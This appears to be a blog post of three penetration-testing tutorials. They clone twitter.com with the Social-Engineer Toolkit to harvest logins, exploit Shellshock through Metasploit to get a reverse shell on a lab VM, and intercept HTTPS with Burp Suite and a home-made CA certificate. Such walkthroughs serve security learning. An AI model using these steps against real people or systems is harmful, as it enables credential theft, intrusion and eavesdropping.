Jerdy's blog

Social Engineering Toolkit

The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the https://www.social-engineer.org launch and has quickly became a standard tool in a penetration testers arsenal. SET was written by David Kennedy (ReL1K) and with a lot of help from the community it has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test.

By using SET, we can clone any website and get the username and the  password.

For this tutorial, let us try to get username and password from twitter.com

In Kali Linux, type: “setoolkit”

After you see the picture above, type 1

Type 2

Type 3

Type 2 then press Enter, and you will see a display like the picture below

Next we  have to input the our IP. In this case, my IP is 10.0.2.15. Then press Enter

We type the site that we want to clone

Next, we go to browser and type the IP address and we will be shown like the picture below. Then, input the username and password and click Enter.

It will be directed to the real page with SSL in it.

We have successfully get the username and password.

In this post, Using Metasploit we are to try to scan the vulnerability that exists in the vulnerable VM and to exploit that vulnerability.

Open Terminal in Kali linux and type msfconsole.

Then, type search shellshock to search for exploits.

Search for the apache_mod_cgi_bash_env_exec module, and copy the location:

Load the exploit by typing use followed by the location we just copied:

Type options to see the various settings for this module:

Next, set the remote host to the IP address of the target. In this case it is 10.0.2.5.

Set also the local host to the IP address of your kali linux.

Finally, set the target URI to the file we place in the /cgi-bin directory:

Type show payloads to view different payloads and information regarding each of them:

Reverse TCP shell will be enough. Type set payload linux/x86/shell/reverse_tcp:

Type options again to check the current settings for this module:

After we are done checking, type check, and if the module allows it, information about whether the target is vulnerable or not will be displayed:

We can see that the target is vulnerable, so use the exploit command to launch the attack.

A shell session is opened, and we can now run commands like id and whoami to view information about the current user:

Firstly, open the browser, Mozilla Firefox, and activate BurpSuite

Now, we are going to set our proxy to manual in Mozilla Firefox.

Click open menu. “open menu” looks like a 3-bar button. Then I click preferences

After clicking preferences, we will be shown something like the image below.

Now at the top right corner, there is a search bar. In the search bar, type “proxy”. Then click the Settings button.

Now, just click Manual proxy configuration then click OK.

Now, we are going to create the new open SSL

These are the files that were created after creating the open SSL: ca.der, server.key.der, and server.key.pkcs8.der

Next, we must import the SSL that we made to the burpsuite and to our browser.

Click the “Import/export certificate” button.

We also need to import the SSL certificate in our browser.

Preferences > Privacy and Security *Scroll to the very bottom* > Certificates > View Certificates

In View Certificates, choose the “Authorities” section and click Import. Choose the ca.der file.

Now after setting our own SSL in Burpsuite and Mozilla Firefox, browse any website and the SSL will be under “Verisign Corp”.

Below is the picture of a HTTPS traffic captured by Burpsuite when browsing youtube.com